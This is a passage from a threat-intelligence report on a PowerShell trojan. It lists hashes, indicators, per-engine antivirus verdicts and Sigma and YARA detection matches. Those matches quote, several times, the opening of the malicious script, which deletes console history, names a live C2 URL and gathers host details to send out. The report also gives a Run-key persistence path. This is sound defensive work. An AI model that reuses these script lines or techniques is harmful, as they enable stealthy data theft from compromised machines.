465a6e816b9e140e3c7cdfb2a4464d6f
Hash
- MD5: 465a6e816b9e140e3c7cdfb2a4464d6f
- SHA1: 542c9c7536b8f9f7b6aff9583274277af685fc82
- SHA256: 50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65
- First Seen: 2026-06-20
- Last Seen: 2026-06-20
- File type: PowerShell script (.ps1), ASCII text with very long lines
- AV verdict: 7/49 engines malicious (Boxter / Wacatac.B!ml heuristics); 10 engines timed out, so the ratio under-reports
- Sandbox network IOC (from the Sigma script-block match below): hxxps://maskasd[.]com/8555575039
- Sandbox persistence (from the Sigma Run-key match below): HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate -> C:\ProgramData\system.bat
- Anti-forensics: clears PSReadLine history and sets -HistorySaveStyle SaveNothing before acting
- Caveat: the "Axios NPM Compromise" and "Powerup Write Hijack DLL" Sigma hits both fire on the C:\ProgramData\system.bat file-creation event only; treat them as filename heuristics, not attribution to those campaigns/tools
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal
{
"data": {
"id": "50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65"
},
"attributes": {
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 4,
"medium": 8,
"low": 3
}
},
"tags": [
"long-sleeps",
"powershell",
"persistence",
"detect-debug-environment"
],
"type_extension": "ps1",
"first_submission_date": 1781803181,
"md5": "465a6e816b9e140e3c7cdfb2a4464d6f",
"javascript_info": {
"tags": [
"malformed"
]
},
"magika": "POWERSHELL",
"crowdsourced_yara_results": [
{
"ruleset_id": "0001fae807",
"ruleset_version": "0001fae807|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_powershell_susp",
"rule_name": "Suspicious_PowerShell_WebDownload_1",
"match_date": 1781830670,
"description": "Detects suspicious PowerShell code that downloads from web sites",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "0121cb9684",
"ruleset_version": "0121cb9684|589bbefc22847193cac455858fa15e627d671918",
"ruleset_name": "Base64_Encoded_Powershell_Directives",
"rule_name": "Base64_Encoded_Powershell_Directives",
"match_date": 1781830670,
"description": "This signature detects base64 encoded Powershell directives.",
"author": "InQuest Labs",
"source": "https://github.com/InQuest/yara-rules-vt"
}
],
"tlsh": "T1B4422C27CEC72D54CB71453520EE18E11A5D23AF21B10EEE660FEADD4EEA17640CA1F9",
"last_analysis_stats": {
"malicious": 7,
"suspicious": 0,
"undetected": 42,
"harmless": 0,
"timeout": 10,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 13
},
"type_description": "Powershell",
"last_submission_date": 1781803181,
"type_tag": "powershell",
"last_modification_date": 1781837869,
"unique_sources": 1,
"magic": "ASCII text, with very long lines (12531u)",
"sha1": "542c9c7536b8f9f7b6aff9583274277af685fc82",
"times_submitted": 1,
"popular_threat_classification": {
"popular_threat_category": [
{
"value": "trojan",
"count": 2
}
],
"suggested_threat_label": "trojan.boxter/horse",
"popular_threat_name": [
{
"value": "boxter",
"count": 4
},
{
"value": "horse",
"count": 1
}
]
},
"reputation": 0,
"filecondis": {
"raw_md5": "294398f96539426302375affca11cab5",
"dhash": "ecb6cc8c8c8c9488"
},
"last_analysis_results": {
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260618",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.239",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260617",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.58.59868",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.58.59867",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1231",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260618",
"category": "malicious",
"result": "Trojan Horse"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26050.11",
"engine_update": "20260618",
"category": "malicious",
"result": "Trojan:Script/Wacatac.B!ml"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5625",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.15146",
"engine_update": "20260619",
"category": "malicious",
"result": "ti!50EAE63D3E24"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260618",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884 (B)"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1781823697",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38740",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260618",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107653",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44961AVA:64.31441",
"engine_update": "20260619",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.1.10706",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-18.02",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "eb947ba:eb947ba:1e47ea2:1e47ea2",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "undetected",
"result": null
},
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": null,
"engine_update": "20260617",
"category": "timeout",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260619",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260619",
"category": "timeout",
"result": null
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": null,
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260614",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260618",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260617-00",
"engine_update": "20260617",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.265",
"engine_update": "20260617",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.789",
"engine_update": "20260616",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260618",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.3.2",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
}
},
"names": [],
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 8,
"low": 3
},
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "1acd404f36bb172d4812ef78feee2cd5dfbedae08997d90ed4ef4048b6ec5964",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Axios NPM Compromise File Creation Indicators - Windows",
"rule_description": "Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.\nOn March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.\nThe dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.\nThe attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
},
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
}
]
},
{
"rule_level": "high",
"rule_id": "30041403950554ea68cae8436931add62874ca499364d423bd04a8ccb124d999",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Clearing Windows Console History",
"rule_description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.",
"rule_author": "Austin Songer @austinsonger",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "7d262d8417cb03b2a9d2b935ae55980f22abc3aa7cffc36e57eda761068226dc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "c50b384b3d0f5d468c48abf6ac8fd6095727405ed00d170aeadf0fc1b4add34b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "HackTool - Powerup Write Hijack DLL",
"rule_description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn its default mode, it builds a self deleting .bat file which executes a malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n",
"rule_author": "Subhash Popuri (@pbssubhash)",
"match_context": [
{
"values": {
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
},
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "098155535b5f140a45c1a07ea729542903d8e4bb81674f7e3a5636d6d121422d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potentially Suspicious DMP/HDMP File Creation",
"rule_description": "Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x10000_dump.dmp"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x20000_dump.dmp",
"EventID": "11"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x50000_dump.dmp"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x60000_dump.dmp"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0xe0000_dump.dmp",
"EventID": "11"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "41a3e620fba7b86366fe885ba1b20dbaae2be7596e2e9b194ab65dae5e4a7b53",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Unsigned Image Loaded Into LSASS Process",
"rule_description": "Loading unsigned image (DLL, EXE) into LSASS process",
"rule_author": "Teymur Kheirkhabarov, oscd.community",
"match_context": [
{
"values": {
"Hashes": "SHA1=ECC47D6C0C4C69D00D2FBA78EFD961C27E32A367,MD5=543AC8C5727EE9F5A83508023257A9E7,SHA256=0BF011593B5CFF9F46909E5998786E30D98440BFFE7251163570CA11CD38E07C,IMPHASH=70A44A432BB24E5D2BF607FE8361DE51",
"SignatureStatus": "Unavailable",
"ImageLoaded": "C:\\p250ps71\\dll\\QaujNuvS.dll",
"Signed": "false",
"Image": "C:\\Windows\\System32\\lsass.exe",
"EventID": "7"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"Path": "",
"EventID": "4104",
